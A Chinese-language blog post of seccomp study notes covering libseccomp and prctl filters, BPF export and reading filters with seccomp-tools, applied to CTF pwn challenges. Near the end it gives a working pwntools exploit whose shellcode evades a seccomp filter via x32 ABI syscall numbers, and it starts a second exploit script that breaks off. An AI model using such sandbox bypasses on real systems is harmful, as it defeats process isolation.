seccomp学习笔记

(Updated: )

做了这么久的pwn,用seccomp做沙箱保护已经见了不是一次两次了,有时候seccomp后面会跟一个结构体,之前遇到这种限制基本靠猜,毕竟自己没有写过seccomp相关的程序.最近又见到几次,想趁此机会学习一把.

What is seccomp

seccomp (short for secure computing mode) is a computer security facility in the Linux kernel. It was merged into the Linux kernel mainline in kernel version 2.6.12, which was released on March 8, 2005. seccomp allows a process to make a one-way transition into a “secure” state where it cannot make any system calls except exit(), sigreturn(), read() and write() to already-open file descriptors. Should it attempt any other system calls, the kernel will terminate the process with SIGKILL or SIGSYS. In this sense, it does not virtualize the system’s resources but isolates the process from them entirely.

用自己的话来说,就是说seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的syscall,这是不安全的,比如劫持程序流后通过execve的syscall来getshell.通过seccomp我们可以在程序中禁用掉某些syscall,这样就算劫持了程序流也只能调用部分的syscall了.

How to use

首先,调用seccomp的程序我们是能够直接运行的,但是我们不能直接编写调用seccomp的程序,因为我们缺少相应的头文件.通过apt安装

1
sudo apt install libseccomp-dev libseccomp2 seccomp

这样应该就有头文件了

1
2
3
4
# veritas @ ubuntu in /usr/include
$ find . -name seccomp.h
./seccomp.h
./linux/seccomp.h

先写一个简单的程序调用一下syscall,简单的输出后,会弹一个shell

1
2
3
4
5
6
7
8
9
10
11
//gcc -g simple_syscall.c -o simple_syscall
#include <unistd.h>

int main(void){
	char * filename = "/bin/sh";
	char * argv[] = {"/bin/sh",NULL};
	char * envp[] = {NULL};
	write(1,"i will give you a shell\n",24);
	syscall(59,filename,argv,envp);//execve
	return 0;
}

现在我们通过seccomp禁用掉execve的syscall.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//gcc -g simple_syscall_seccomp.c -o simple_syscall_seccomp -lseccomp
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

int main(void){
	scmp_filter_ctx ctx;
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
	seccomp_load(ctx);

	char * filename = "/bin/sh";
	char * argv[] = {"/bin/sh",NULL};
	char * envp[] = {NULL};
	write(1,"i will give you a shell\n",24);
	syscall(59,filename,argv,envp);//execve
	return 0;
}

运行结果:

1
2
3
4
# veritas @ ubuntu in ~/test/seccomp
$ ./simple_syscall_seccomp 
i will give you a shell
[1]    14024 invalid system call (core dumped)  ./simple_syscall_seccomp

稍微解释一下上面几个函数

ctxFilter context/handle,其中typedef void *scmp_filter_ctx;
seccomp_init是初始化的过滤状态,这里用的是SCMP_ACT_ALLOW,表示默认允许所有的syscacll.如果初始化状态为SCMP_ACT_KILL,则表示默认不允许所有的syscall

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
/*
 * seccomp actions
 */

/**
 * Kill the process
 */
#define SCMP_ACT_KILL		0x00000000U
/**
 * Throw a SIGSYS signal
 */
#define SCMP_ACT_TRAP		0x00030000U
/**
 * Return the specified error code
 */
#define SCMP_ACT_ERRNO(x)	(0x00050000U | ((x) & 0x0000ffffU))
/**
 * Notify a tracing process with the specified value
 */
#define SCMP_ACT_TRACE(x)	(0x7ff00000U | ((x) & 0x0000ffffU))
/**
 * Allow the syscall to be executed after the action has been logged
 */
#define SCMP_ACT_LOG		0x7ffc0000U
/**
 * Allow the syscall to be executed
 */
#define SCMP_ACT_ALLOW		0x7fff0000U

seccomp_rule_add是添加一条规则,函数原形如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/**
 * Add a new rule to the filter
 * @param ctx the filter context
 * @param action the filter action
 * @param syscall the syscall number
 * @param arg_cnt the number of argument filters in the argument filter chain
 * @param ... scmp_arg_cmp structs (use of SCMP_ARG_CMP() recommended)
 *
 * This function adds a series of new argument/value checks to the seccomp
 * filter for the given syscall; multiple argument/value checks can be
 * specified and they will be chained together (AND'd together) in the filter.
 * If the specified rule needs to be adjusted due to architecture specifics it
 * will be adjusted without notification.  Returns zero on success, negative
 * values on failure.
 *
 */
int seccomp_rule_add(scmp_filter_ctx ctx,
		     uint32_t action, int syscall, unsigned int arg_cnt, ...);

seccomp_load是应用过滤,如果不调用seccomp_load则上面所有的过滤都不会生效

1
2
3
4
5
6
7
8
9
10
11
/**
 * Loads the filter into the kernel
 * @param ctx the filter context
 *
 * This function loads the given seccomp filter context into the kernel.  If
 * the filter was loaded correctly, the kernel will be enforcing the filter
 * when this function returns.  Returns zero on success, negative values on
 * error.
 *
 */
int seccomp_load(const scmp_filter_ctx ctx);

有一点需要再说一下,我们用的是seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);,arg_cnt为0,表示我们直接限制execve,不管他什么参数.

如果arg_cnt不为0,那arg_cnt表示后面限制的参数的个数,也就是只有调用execve,且参数满足要求时,才会拦截syscall.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
/**
 * Specify an argument comparison struct for use in declaring rules
 * @param arg the argument number, starting at 0
 * @param op the comparison operator, e.g. SCMP_CMP_*
 * @param datum_a dependent on comparison
 * @param datum_b dependent on comparison, optional
 */
#define SCMP_CMP(...)		((struct scmp_arg_cmp){__VA_ARGS__})

/**
 * Specify an argument comparison struct for argument 0
 */
#define SCMP_A0(...)		SCMP_CMP(0, __VA_ARGS__)

/**
 * Specify an argument comparison struct for argument 1
 */
#define SCMP_A1(...)		SCMP_CMP(1, __VA_ARGS__)

/**
 * Specify an argument comparison struct for argument 2
 */
#define SCMP_A2(...)		SCMP_CMP(2, __VA_ARGS__)

/**
 * Specify an argument comparison struct for argument 3
 */
#define SCMP_A3(...)		SCMP_CMP(3, __VA_ARGS__)

/**
 * Specify an argument comparison struct for argument 4
 */
#define SCMP_A4(...)		SCMP_CMP(4, __VA_ARGS__)

/**
 * Specify an argument comparison struct for argument 5
 */
#define SCMP_A5(...)		SCMP_CMP(5, __VA_ARGS__)



/**
 * Comparison operators
 */
enum scmp_compare {
	_SCMP_CMP_MIN = 0,
	SCMP_CMP_NE = 1,		/**< not equal */
	SCMP_CMP_LT = 2,		/**< less than */
	SCMP_CMP_LE = 3,		/**< less than or equal */
	SCMP_CMP_EQ = 4,		/**< equal */
	SCMP_CMP_GE = 5,		/**< greater than or equal */
	SCMP_CMP_GT = 6,		/**< greater than */
	SCMP_CMP_MASKED_EQ = 7,		/**< masked equality */
	_SCMP_CMP_MAX,
};

/**
 * Argument datum
 */
typedef uint64_t scmp_datum_t;

/**
 * Argument / Value comparison definition
 */
struct scmp_arg_cmp {
	unsigned int arg;	/**< argument number, starting at 0 */
	enum scmp_compare op;	/**< the comparison op, e.g. SCMP_CMP_* */
	scmp_datum_t datum_a;
	scmp_datum_t datum_b;
};

举几个栗子

比如我要只拦截哪些length等于0x10的write系统调用,可以这样写:

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

int main(void){
	scmp_filter_ctx ctx;
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(write),1,SCMP_A2(SCMP_CMP_EQ,0x10));//第2(从0)个参数等于0x10
	seccomp_load(ctx);
	write(1,"i will give you a shell\n",24);//不被拦截
	write(1,"1234567812345678",0x10);//被拦截
	return 0;
}

除了seccomp,还有一个叫prctl的函数也能做到类似的效果

函数原形

1
2
3
4
#include <sys/prctl.h>

int prctl(int option, unsigned long arg2, unsigned long arg3,
          unsigned long arg4, unsigned long arg5);

当option为PR_SET_NO_NEW_PRIVS(38),且arg2为1时,将无法获得特权

1
2
3
4
5
6
7
8
9
10
11
12
PR_SET_NO_NEW_PRIVS (since Linux 3.5)
    Set the calling process's no_new_privs bit to the value in arg2.
    With no_new_privs set to 1,  execve(2)  promises  not  to  grant
    privileges  to do anything that could not have been done without
    the execve(2) call (for example, rendering the  set-user-ID  and
    set-group-ID  mode  bits, and file capabilities non-functional).
    Once set, this bit cannot be unset.  The setting of this bit  is
    inherited  by  children  created  by  fork(2)  and clone(2), and
    preserved across execve(2).
    
    For   more   information,   see   the   kernel    source    file
    Documentation/prctl/no_new_privs.txt.

例子:

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <unistd.h>
#include <sys/prctl.h>

int main(void){
	prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);

	char * filename = "/bin/sh";
	char * argv[] = {"/bin/sh",NULL};
	char * envp[] = {NULL};
	write(1,"i will give you a shell\n",24);
	syscall(59,filename,argv,envp);//execve
	return 0;
}

运行效果

1
2
3
4
5
6
7
8
9
10
11
12
# veritas @ ubuntu in ~/test/seccomp
$ ./prctl_test                  
i will give you a shell
$ sudo sh
sudo: effective uid is not 0, is sudo installed setuid root?
$ whoami
veritas
$ id
uid=1000(veritas) gid=1000(veritas) groups=1000(veritas),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ sudo
sudo: effective uid is not 0, is sudo installed setuid root?
$

当option为PR_SET_SECCOMP(22)时,效果就是我们上面的seccomp了,只不过这里的格式略有不同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
PR_SET_SECCOMP (since Linux 2.6.23)
   Set the secure computing (seccomp) mode for the calling  thread,
   to limit the available system calls.  The more recent seccomp(2)
   system  call  provides  a  superset  of  the  functionality   of
   PR_SET_SECCOMP.

   The  seccomp  mode is selected via arg2.  (The seccomp constants
   are defined in <linux/seccomp.h>.)

   With arg2 set to SECCOMP_MODE_STRICT, the only system calls that
   the  thread is permitted to make are read(2), write(2), _exit(2)
   (but not exit_group(2)), and sigreturn(2).  Other  system  calls
   result  in  the  delivery  of  a  SIGKILL signal.  Strict secure
   computing mode is useful for number-crunching applications  that
   may  need  to  execute  untrusted byte code, perhaps obtained by
   reading from a pipe or socket.  This operation is available only
   if the kernel is configured with CONFIG_SECCOMP enabled.

   With  arg2  set  to  SECCOMP_MODE_FILTER  (since Linux 3.5), the
   system calls allowed are defined by  a  pointer  to  a  Berkeley
   Packet  Filter  passed  in  arg3.  This argument is a pointer to
   struct sock_fprog; it can be designed to filter arbitrary system
   calls and system call arguments.  This mode is available only if
   the kernel is configured with CONFIG_SECCOMP_FILTER enabled.

   If SECCOMP_MODE_FILTER filters permit fork(2), then the  seccomp
   mode  is  inherited by children created by fork(2); if execve(2)
   is  permitted,  then  the  seccomp  mode  is  preserved   across
   execve(2).  If the filters permit prctl() calls, then additional
   filters can be added; they are run in order until the first non-
   allow result is seen.

   For   further   information,   see   the   kernel   source  file
   Documentation/prctl/seccomp_filter.txt.

解释一下,如果arg2为SECCOMP_MODE_STRICT(1),则只允许调用read,write,_exit(not exit_group),sigreturn这几个syscall.如果arg2为SECCOMP_MODE_FILTER(2),则为过滤模式,其中对syscall的限制通过arg3用BPF(Berkeley Packet Filter)的形式传进来,是指向struct sock_fprog数组的指针.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/*
 *	Try and keep these values and structures similar to BSD, especially
 *	the BPF code definitions which need to match so you can share filters
 */
 
struct sock_filter {	/* Filter block */
	__u16	code;   /* Actual filter code */
	__u8	jt;	/* Jump true */
	__u8	jf;	/* Jump false */
	__u32	k;      /* Generic multiuse field */
};
struct sock_fprog {	/* Required for SO_ATTACH_FILTER. */
	unsigned short		len;	/* Number of filter blocks */
	struct sock_filter *filter;
};

这里可以看到部分解释https://eigenstate.org/notes/seccomp

使用例子
我们可以把之前simple_syscall_seccomp中的seccomp改为prctl试试

首先,有一个叫seccomp_export_bpf的函数能够将设置的seccomp以bpf的形式导出,我们稍稍修改simple_syscall_seccomp.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
//gcc -g simple_syscall_seccomp.c -o simple_syscall_seccomp -lseccomp
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>
#include <fcntl.h>
int main(void){

	scmp_filter_ctx ctx;
	ctx = seccomp_init(SCMP_ACT_ALLOW);
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(write),1,SCMP_A2(SCMP_CMP_EQ,0x10));
	seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve),0);
	seccomp_load(ctx);

	int fd = open("bpf.out",O_WRONLY);
	seccomp_export_bpf(ctx,fd);
	close(fd);


	char * filename = "/bin/sh";
	char * argv[] = {"/bin/sh",NULL};
	char * envp[] = {NULL};
	write(1,"i will give you a shell\n",24);
	write(1,"1234567812345678",0x10);
	syscall(0x4000003b,filename,argv,envp);//execve
	return 0;
}

从而得到了bpf

1
2
3
4
5
6
7
8
9
# veritas @ ubuntu in ~/test/seccomp
$ hexdump bpf.out
0000000 0020 0000 0004 0000 0015 0900 003e c000
0000010 0020 0000 0000 0000 0035 0007 0000 4000
0000020 0015 0006 003b 0000 0015 0400 0001 0000
0000030 0020 0000 0024 0000 0015 0200 0000 0000
0000040 0020 0000 0020 0000 0015 0001 0010 0000
0000050 0006 0000 0000 7fff 0006 0000 0000 0000
0000060

改用prctl:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#include <unistd.h>
#include <sys/prctl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

int main(void){
	
	prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
	struct sock_filter sfi[] = {
		{0x20,0x00,0x00,0x00000004},
		{0x15,0x00,0x09,0xc000003e},
		{0x20,0x00,0x00,0x00000000},
		{0x35,0x07,0x00,0x40000000},
		{0x15,0x06,0x00,0x0000003b},
		{0x15,0x00,0x04,0x00000001},
		{0x20,0x00,0x00,0x00000024},
		{0x15,0x00,0x02,0x00000000},
		{0x20,0x00,0x00,0x00000020},
		{0x15,0x01,0x00,0x00000010},
		{0x06,0x00,0x00,0x7fff0000},
		{0x06,0x00,0x00,0x00000000}
	};
	struct sock_fprog sfp = {12,sfi};

	prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&sfp);
	
	char * filename = "/bin/sh";
	char * argv[] = {"/bin/sh",NULL};
	char * envp[] = {NULL};
	write(1,"i will give you a shell\n",24);
	write(1,"1234567812345678",0x10);
	syscall(0x4000003b,filename,argv,envp);//execve
	return 0;
}

成功拦截

1
2
3
4
# veritas @ ubuntu in ~/test/seccomp
$ ./prctl_test            
i will give you a shell
[1]    20120 invalid system call (core dumped)  ./prctl_test

How to reverse

可以使用现成的工具,感谢大佬们的开发orz
https://github.com/david942j/seccomp-tools

使用例子,seccomp和prctl都能用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# veritas @ ubuntu in ~/test/seccomp
$ seccomp-tools dump ./simple_syscall_seccomp
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x07 0x00 0x40000000  if (A >= 0x40000000) goto 0011
 0004: 0x15 0x06 0x00 0x0000003b  if (A == execve) goto 0011
 0005: 0x15 0x00 0x04 0x00000001  if (A != write) goto 0010
 0006: 0x20 0x00 0x00 0x00000024  A = args[2] >> 32
 0007: 0x15 0x00 0x02 0x00000000  if (A != 0x0) goto 0010
 0008: 0x20 0x00 0x00 0x00000020  A = args[2]
 0009: 0x15 0x01 0x00 0x00000010  if (A == 0x10) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL
 
# veritas @ ubuntu in ~/test/seccomp
$ seccomp-tools dump ./prctl_test            
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0xc000003e  if (A != ARCH_X86_64) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x07 0x00 0x40000000  if (A >= 0x40000000) goto 0011
 0004: 0x15 0x06 0x00 0x0000003b  if (A == execve) goto 0011
 0005: 0x15 0x00 0x04 0x00000001  if (A != write) goto 0010
 0006: 0x20 0x00 0x00 0x00000024  A = args[2] >> 32
 0007: 0x15 0x00 0x02 0x00000000  if (A != 0x0) goto 0010
 0008: 0x20 0x00 0x00 0x00000020  A = args[2]
 0009: 0x15 0x01 0x00 0x00000010  if (A == 0x10) goto 0011
 0010: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0011: 0x06 0x00 0x00 0x00000000  return KILL

我们去测测之前的一些题目吧

  • pwnable.tw orw
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
unsigned int orw_seccomp()
{
  __int16 v1; // [esp+4h] [ebp-84h]
  char *v2; // [esp+8h] [ebp-80h]
  char v3; // [esp+Ch] [ebp-7Ch]
  unsigned int v4; // [esp+6Ch] [ebp-1Ch]

  v4 = __readgsdword(0x14u);
  qmemcpy(&v3, stru_8048640, 0x60u);
  v1 = 12;                                      // 参数个数
  v2 = &v3;
  prctl(38, 1, 0, 0, 0);                        // prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
  prctl(22, 2, &v1);                            // prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER)
  return __readgsdword(0x14u) ^ v4;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
.rodata:08048640 ; sock_filter stru_8048640[12]
.rodata:08048640 stru_8048640    sock_filter <20h, 0, 0, 4>
.rodata:08048640                                         ; DATA XREF: orw_seccomp+17↑o
.rodata:08048648                 sock_filter <15h, 0, 9, 40000003h>
.rodata:08048650                 sock_filter <20h, 0, 0, 0>
.rodata:08048658                 sock_filter <15h, 7, 0, 0ADh>
.rodata:08048660                 sock_filter <15h, 6, 0, 77h>
.rodata:08048668                 sock_filter <15h, 5, 0, 0FCh>
.rodata:08048670                 sock_filter <15h, 4, 0, 1>
.rodata:08048678                 sock_filter <15h, 3, 0, 5>
.rodata:08048680                 sock_filter <15h, 2, 0, 3>
.rodata:08048688                 sock_filter <15h, 1, 0, 4>
.rodata:08048690                 sock_filter <6, 0, 0, 50026h>
.rodata:08048698                 sock_filter <6, 0, 0, 7FFF0000h>

用seccomp-tools得到以下结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ seccomp-tools dump ./orw.bin               
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x09 0x40000003  if (A != ARCH_I386) goto 0011
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x07 0x00 0x000000ad  if (A == rt_sigreturn) goto 0011
 0004: 0x15 0x06 0x00 0x00000077  if (A == sigreturn) goto 0011
 0005: 0x15 0x05 0x00 0x000000fc  if (A == exit_group) goto 0011
 0006: 0x15 0x04 0x00 0x00000001  if (A == exit) goto 0011
 0007: 0x15 0x03 0x00 0x00000005  if (A == open) goto 0011
 0008: 0x15 0x02 0x00 0x00000003  if (A == read) goto 0011
 0009: 0x15 0x01 0x00 0x00000004  if (A == write) goto 0011
 0010: 0x06 0x00 0x00 0x00050026  return ERRNO(38)
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW

在i386下,只允许了write,read,open,exit,exit_group,sigreturn,rt_sigreturn

所以这题没法用execve拿shell

  • 0ctf misc mathgame
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
$ seccomp-tools dump ./subtraction
Starting system, please wait...
System started!
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0x40000003  if (A == ARCH_I386) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x000000ad  if (A != rt_sigreturn) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x00000077  if (A != sigreturn) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x000000fc  if (A != exit_group) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x00000001  if (A != exit) goto 0012
 0011: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0012: 0x15 0x00 0x01 0x00000005  if (A != open) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x15 0x00 0x01 0x00000003  if (A != read) goto 0016
 0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0016: 0x15 0x00 0x01 0x00000004  if (A != write) goto 0018
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0018: 0x15 0x00 0x01 0x000000c5  if (A != fstat64) goto 0020
 0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0020: 0x15 0x00 0x01 0x00000036  if (A != ioctl) goto 0022
 0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0022: 0x15 0x00 0x01 0x0000008c  if (A != _llseek) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x15 0x00 0x01 0x000000c0  if (A != mmap2) goto 0026
 0025: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0026: 0x15 0x00 0x01 0x0000005b  if (A != munmap) goto 0028
 0027: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0028: 0x15 0x00 0x01 0x0000002d  if (A != brk) goto 0030
 0029: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0030: 0x06 0x00 0x00 0x00000000  return KILL

也就是只允许了上面能看到的那些syscall

  • qwb2018 xx_game
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
$ seccomp-tools dump "./dec.pwn 4091897731" 
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x19 0xc000003e  if (A != ARCH_X86_64) goto 0027
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x17 0x00 0x40000000  if (A >= 0x40000000) goto 0027
 0004: 0x15 0x15 0x00 0x00000000  if (A == read) goto 0026
 0005: 0x15 0x14 0x00 0x00000002  if (A == open) goto 0026
 0006: 0x15 0x13 0x00 0x00000003  if (A == close) goto 0026
 0007: 0x15 0x12 0x00 0x00000005  if (A == fstat) goto 0026
 0008: 0x15 0x11 0x00 0x0000000c  if (A == brk) goto 0026
 0009: 0x15 0x10 0x00 0x0000000f  if (A == rt_sigreturn) goto 0026
 0010: 0x15 0x0f 0x00 0x0000003c  if (A == exit) goto 0026
 0011: 0x15 0x0e 0x00 0x000000e7  if (A == exit_group) goto 0026
 0012: 0x15 0x00 0x0e 0x00000001  if (A != write) goto 0027
 0013: 0x20 0x00 0x00 0x00000014  A = args[0] >> 32
 0014: 0x15 0x00 0x0c 0x00000000  if (A != 0x0) goto 0027
 0015: 0x20 0x00 0x00 0x00000010  A = args[0]
 0016: 0x15 0x09 0x00 0x00000002  if (A == 0x2) goto 0026
 0017: 0x15 0x00 0x09 0x00000001  if (A != 0x1) goto 0027
 0018: 0x20 0x00 0x00 0x0000001c  A = args[1] >> 32
 0019: 0x15 0x00 0x07 0x00000000  if (A != 0x0) goto 0027
 0020: 0x20 0x00 0x00 0x00000018  A = args[1]
 0021: 0x15 0x00 0x05 0x00602100  if (A != 0x602100) goto 0027
 0022: 0x20 0x00 0x00 0x00000024  A = args[2] >> 32
 0023: 0x35 0x00 0x02 0x00000000  if (A < 0x0) goto 0026
 0024: 0x20 0x00 0x00 0x00000020  A = args[2]
 0025: 0x25 0x01 0x00 0x00000080  if (A > 0x80) goto 0027
 0026: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0027: 0x06 0x00 0x00 0x00000000  return KILL

这下就清楚了,允许read,open,close,fstat,brk,rt_sigreturn,exit,exit_group

其中write是有参数限制的,不满足条件就kill,而条件是第一个参数只能为1或2,第二个参数只能为0x602100,第三个参数的高4位小于0x80.

Some challenge

在学习的过程中,我还找到了一些以seccomp为主体的题目,不得不佩服

  • 2015 baby playpen fence

Link: https://github.com/yvrctf/2015/blob/master/babyplaypenfence/README.md

首先用ida看了一遍,构造合理的输入,触发prctl_seccomp得到保护信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ sudo seccomp-tools dump -c "./babypf < stdin"

   ______
  | |__| |  WELCOME TO THE
  |  ()  |  UNTRUSTED COMPUTING SERVICE
  |______|  V0.0.1a

LOAD PROGRAM
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0006
 0005: 0x06 0x00 0x00 0x00050016  return ERRNO(22)
 0006: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0008
 0007: 0x06 0x00 0x00 0x00050016  return ERRNO(22)
 0008: 0x15 0x00 0x01 0x00000101  if (A != openat) goto 0010
 0009: 0x06 0x00 0x00 0x00050016  return ERRNO(22)
 0010: 0x15 0x00 0x01 0x00000130  if (A != open_by_handle_at) goto 0012
 0011: 0x06 0x00 0x00 0x00050016  return ERRNO(22)
 0012: 0x15 0x00 0x01 0x00000065  if (A != ptrace) goto 0014
 0013: 0x06 0x00 0x00 0x00050016  return ERRNO(22)
 0014: 0x06 0x00 0x00 0x7fff0000  return ALLOW

只禁用了open,mmap,openat, open_by_handle_at和ptrace

第一反应:那为啥不直接用execve???

1
2
3
4
5
6
7
8
$ python exp.py                                
[+] Starting local process './babypf': pid 23036
[*] Switching to interactive mode
[*] Process './babypf' stopped with exit code 0 (pid 23036)
sh: error while loading shared libraries: libc.so.6: cannot open shared object file: Invalid argument
THANK YOU
[*] Got EOF while reading in interactive
$

果然是我太年轻了

wp上说Since 3.4 the Linux kernel has had a feature called the X32 ABI; 64bit syscalls with 32bit pointers.

看了一下/usr/include/x86_64-linux-gnu/asm/unistd_x32.h

内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#ifndef _ASM_X86_UNISTD_X32_H
#define _ASM_X86_UNISTD_X32_H 1

#define __NR_read (__X32_SYSCALL_BIT + 0)
#define __NR_write (__X32_SYSCALL_BIT + 1)
#define __NR_open (__X32_SYSCALL_BIT + 2)
#define __NR_close (__X32_SYSCALL_BIT + 3)
#define __NR_stat (__X32_SYSCALL_BIT + 4)
#define __NR_fstat (__X32_SYSCALL_BIT + 5)
#define __NR_lstat (__X32_SYSCALL_BIT + 6)
#define __NR_poll (__X32_SYSCALL_BIT + 7)
#define __NR_lseek (__X32_SYSCALL_BIT + 8)
#define __NR_mmap (__X32_SYSCALL_BIT + 9)
#define __NR_mprotect (__X32_SYSCALL_BIT + 10)
......

__X32_SYSCALL_BIT0x40000000

构造shellcode读出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context.arch = 'amd64'
local = 1

if local:
	cn = process('./babypf')
	bin = ELF('./babypf',checksec=False)
	#libc = ELF('',checksec=False)
else:
	#cn = remote('')
	pass


def z(a=''):
	gdb.attach(cn,a)
	if a == '':
		raw_input()


cn.recvuntil('LOAD PROGRAM\n')

sc = '''
    push 0x1010101 ^ 0x7478
    xor dword ptr [rsp], 0x1010101
    mov rax, 0x742e67616c662f2e
    push rax
	mov rdi, rsp
	xor edx, edx /* 0 */
	xor esi, esi /* 0 */
	mov rax,0x40000002
	syscall

	mov rdi, rax
	sub rsp, 0x1000
	lea rsi, [rsp]
	mov rdx, 0x1000
	mov rax, 0x40000000
	syscall

	mov rdi, 1
	mov rdx, rax
	mov rax, 0x40000001
	syscall

	mov rax, 0x4000003c
	xor rdi, rdi
	syscall
'''
sc = asm(sc)
cn.send(p32(len(sc)))
sleep(0.2)
cn.send(sc)

cn.interactive()
  • 2015 big prison fence

Link: https://github.com/yvrctf/2015/blob/master/bigprisonfence/README.md

这次程序的保护为

1
2
3
prctl(PR_SET_DUMPABLE, 0, 0, 0, 0);
prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT, 0, 0, 0);

第一个似乎会使我们gdb调试崩溃
第三个限制我们只能使用read, write, _exit(but not exit_group), sigreturn.

但由于程序一开始就把flag读进程序了,因此我们只要想办法把他leak出来就行

可惜程序关闭了0~1024的fd,因此考虑写延时shellcode,1bit 1bit来leak.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
#coding=utf8
from pwn import *
#context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

